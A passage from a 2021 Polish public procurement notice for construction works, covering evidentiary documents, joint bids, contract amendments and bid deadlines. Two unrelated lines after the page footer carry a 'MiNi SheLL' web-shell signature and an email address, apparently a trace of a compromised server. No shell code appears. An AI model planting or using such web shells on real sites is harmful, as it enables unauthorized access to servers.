jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/>wskazane zdolności dotyczą,<br/>6. Zamawiający ocenia, czy udostępniane Wykonawcy przez inne podmioty udostępniające<br/>zasoby zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna,<br/>pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o<br/>których mowa w art.112 ust.2 pkt.3 i 4 ustawy PZP, oraz jeżeli to dotyczy, kryteriów selekcji a<br/>także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały<br/>przewidziane względem Wykonawcy.<br/>7. Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z<br/>Wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną<br/>przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za<br/>nieudostępnienie zasobów podmiot ten nie ponosi winy.<br/>8. Jeżeli zdolności techniczne lub zawodowe lub sytuacja ekonomiczna lub finansowa, podmiotu<br/>udostępniającego zasoby nie potwierdzają spełnienia przez Wykonawcę warunków udziału w<br/>postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda,<br/>aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym<br/>podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w<br/>postepowaniu.<br/>9. Wykonawca nie może, po upływie terminu składania wniosków o dopuszczenie do udziału w<br/>postępowaniu albo ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających<br/>zasoby, jeżeli na etapie składania wniosków o dopuszczenie do udziału w postępowaniu albo<br/>ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Ostateczne potwierdzenie spełniania warunków udziału w postępowaniu zostanie dokonane na podstawie złożonych podmiotowych środków dowodowych określonych w<br/>Rozdziałach IX. Ocenie na tym etapie podlegać będzie wyłącznie Wykonawca, którego oferta zostanie<br/>oceniona jako najkorzystniejsza, spośród tych, które nie zostaną odrzucone.<br/>2. Jeżeli wykonawca nie złożył oświadczenia, o którym mowa w art. 125 ust.1, podmiotowych środków<br/>dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu lub są one<br/>niekompletne lub zawierają błędy, zamawiający wzywa wykonawcę odpowiednio do ich złożenia,<br/>poprawienia lub uzupełnienia w wyznaczonym terminie, chyba że wniosek o dopuszczenie do udziału<br/>w postępowaniu albo oferta wykonawcy podlegają odrzuceniu bez względu na ich złożenie,<br/>uzupełnienie lub poprawienie lub zachodzą przesłanki unieważnienia postępowania.<br/>3. Wykonawca składa podmiotowe środki dowodowe na wezwanie, o którym mowa w zdaniu<br/>poprzedzającym, aktualne na dzień ich złożenia. Złożenie, uzupełnienie lub poprawienie oświadczenia,<br/>o którym mowa w art. 125 ust.1, lub podmiotowych środków dowodowych nie może służyć<br/>potwierdzeniu spełniania warunków udziału w postępowaniu lub kryteriów selekcji.<br/>4. Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści oświadczenia, o którym<br/>mowa w art. 125 ust.1, lub złożonych podmiotowych środków dowodowych lub innych dokumentów lub<br/>oświadczeń składanych w postępowaniu.<br/>5. Zamawiający żąda złożenia podmiotowych środków dowodowych na potwierdzenie spełnienia<br/>warunków udziału w postępowaniu.<br/>6. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych, aktualnych na dzień złożenia oferty tj.:<br/>1) Wykaz robót budowlanych – zrealizowanych w okresie ostatnich 5 (pięciu) lat przed upływem<br/>terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wraz z<br/>podaniem ich rodzaju, daty, wartości oraz miejsca wykonania i podmiotów, na rzecz których roboty<br/>budowlane zostały wykonane, w zakresie wymaganym do spełnienia warunków udziału w<br/>postępowaniu – wzór dokumentu stanowi Załącznik nr 4 do SWZ.<br/>Do wykazu należy dołączyć dowody określające, czy roboty budowlane zostały wykonane należycie i<br/>prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z<br/>uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych<br/>dokumentów – oświadczenie Wykonawcy. W przypadku świadczeń okresowych lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być<br/>wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>2) Wykaz Osób – skierowanych przez wykonawcę do realizacji zamówienia publicznego, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informację o podstawie do dysponowania tymi osobami – wzór dokumentu stanowi<br/>Załącznik nr 5 do SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zamawiający przewiduje kosztorysowe rozliczenie przedmiotu zamówienia i żąda załączenia do<br/>oferty kosztorysu ofertowego stanowiącego integralną cześć oferty. Kosztorys należy<br/>sporządzić ściśle wg wzoru stanowiącego Załącznik Nr 7 do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty w wyodrębnionym pliku. Pełnomocnictwo przekazuje się w postaci<br/>elektronicznej i opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym. W przypadku gdy pełnomocnictwo zostało wystawione w postaci<br/>papierowej i opatrzone własnoręcznym podpisem przekazuje się cyfrowe odwzorowanie tego<br/>dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w<br/>postaci papierowej. Poświadczenie zgodności cyfrowego odwzorowania z pełnomocnictwem w<br/>postaci papierowej może dokonać mocodawca ( osoba/ osoby wystawiające pełnomocnictwo )<br/>lub notariusz.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w SWZ, składa każdy z wykonawców. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim<br/>każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. (oświadczenie i<br/>dokumenty składa się pod rygorem nieważności w formie elektronicznej, opatrzonej<br/>kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej, opatrzone podpisem<br/>zaufanym lub podpisem osobistym). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje zmianę umowy na podst. art. 454 PZP w szczególności w<br/>następującym zakresie:- zmiana wynagrodzenia,- zmiana terminu realizacji robót budowlanych,-<br/>zmiana osób odpowiedzialnych za wykonanie przedmiotu umowy. Szczegółowy zakres został<br/>opisany we wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-13 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem platformy prowadzonego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-13 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-28 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com